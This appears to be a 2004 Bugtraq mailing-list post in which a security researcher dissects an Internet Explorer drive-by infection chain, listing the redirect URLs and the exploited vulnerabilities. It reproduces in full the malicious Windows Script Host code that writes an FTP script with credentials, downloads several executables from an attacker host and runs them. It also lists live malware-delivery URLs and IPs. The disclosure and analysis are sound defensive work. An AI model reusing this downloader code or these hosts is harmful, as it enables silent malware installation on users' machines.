Nothing new here, it's just one of the remaining IE vulnerabilities that are not yet patched. If I dare allow a small product pitch, the publicly available version of Qwik-Fix ( http://qwik-fix.net ) has protected against threats such as this for more than half a year now, without requiring any signature updates (since there are no need for signatures). This is not the first time that spyware has mixed with vulnerabilities, exploits and worms. Spyware is increasingly becoming a corporate liability, Robert Mitchell recently did a feature story on this at http://www.computerworld.com/securitytopics/security/story/0,10801,92784 ,00.html The high of IE vulnerabilities on my Unpatched list was 32, right now we are at about 12 that still have no patches. There's continuously new research being posted to the Unpatched mailing list ( http://unpatched.pivxlabs.com ) on topics such as this spyware/worm threat. Anyway, back to hnc3k.com - there is obviously a lot happening on all of these popups, and quite a number of IE exploits are being exploited. A hint of caution, don't go to any of these pages without Qwik-Fix on your machine, they contain malicious code which will execute on your system if it does not have adequate protection. Another hint of caution, don't panic if your AV labels this email as being naughty just because I mention specific dirty words. One of the pages that try to exploit IE vulnerabilities is at http://65.17.207.40/framepb_1u.php which redirects to http://si1.default-homepage-network.com/180/180.htm?si-001 which redirects to http://object.passthison.com/vu083003/object.cgi?si1 which uses the Object Data vulnerability to change your startpage to http://default-homepage-network.com/start.cgi?hkcu the parameter at the end is either HKCU or HKLM depending on what registry branch lead you there. This serves to notify default-homepage-network whether your machine has been compromised with user or administrator privileges start.cgi also opens a few popup windows with advertisements, after which it opens the following page http://default-homepage-network.com/newspynotice.html that wants to sell you a cure against spyware which hijacks your start page - as theirs just did. That page also secretly opens http://object.passthison.com/vu083003/newobject1.cgi http://69.50.139.61/hp1/hp1.htm http://www.achtungachtung.com/0021/index.php newobject1.cgi executes the following commands through the Windows Script Host object: wsh.Run('command /C echo open downloads.default-homepage-network.com>o',false,6); wsh.Run('command /C echo tmpacct>>o',false,6); wsh.Run('command /C echo 12345>>o',false,6); wsh.Run('command /C echo bin>>o',false,6); wsh.Run('command /C echo get install2.exe>>o',false,6); wsh.Run('command /C echo get infamous_downloader.exe>>o',false,6); wsh.Run('command /C echo get 0021-bdl94126.EXE>>o',false,6); wsh.Run('command /C echo get CS4P028.exe>>o',false,6); wsh.Run('command /C echo bye>>o',false,6); wsh.Run('command /C echo if not exist %windir%\statuslog ftp -s:o >o.bat',false,6); wsh.Run('command /C echo if exist install2.exe install2.exe >>o.bat',false,6); wsh.Run('command /C echo if exist infamous_downloader.exe infamous_downloader.exe >>o.bat',false,6); wsh.Run('command /C echo if exist 0021-bdl94126.EXE 0021-bdl94126.EXE >>o.bat',false,6); wsh.Run('command /C echo if exist CS4P028.exe CS4P028.exe >>o.bat',false,6); wsh.Run('command /C o.bat',false,6); Hp1.htm tries to exploit the Ibiza MHTML/CHM vulnerability to launch http://69.50.139.61/hp1/HP1.chm::/hp1.htm framepb_1u.php also tries to open http://69.50.139.61/hp2/hp2.htm which uses Ibiza to launch http://69.50.139.61/hp2/hp2.chm::/hp2.htm Other files that are attempted to be delivered are http://www.addictivetechnologies.net/DM0/cab/emCraft1.cab http://www.addictivetechnologies.net/DM0/exe/emCraft1.exe http://validation-required.info/ http://www.popmoney.net/ip/index.php http://www.portalone.hostance.com.com/italia.exe Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com thor@xxxxxxxx Stock symbol: (PIVX) Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. <http://www.pivx.com/qwikfix> -----Original Message----- From: Greg Kujawa [mailto:greg.kujawa@xxxxxxxxxxxxxxxxx] Sent: Friday, May 14, 2004 7:37 AM To: bugtraq@xxxxxxxxxxxxxxxxx Subject: Still Vulnerable in MSIE With the latest vendor AV definitions and all of the Microsoft Security Updates my MSIE 6 application still was vulnerable to some apparent cross-site scripting exploit. I was hit with one of the many Agobot variants when exiting a site detailing some IE vulnerabilities (http://www.hnc3k.com). The site exit led to a series of pop-up and pop-under ads. All of these site redirects apparently resulted in a www2.flingstone.com site dropping in a infamous.exe file onto my computer. All the while I saw no prompts to download or execute anything whatsoever. All I did was close the windows that were coming up. Just an FYI since even the latest updates on all fronts cannot ensure peace of mind.
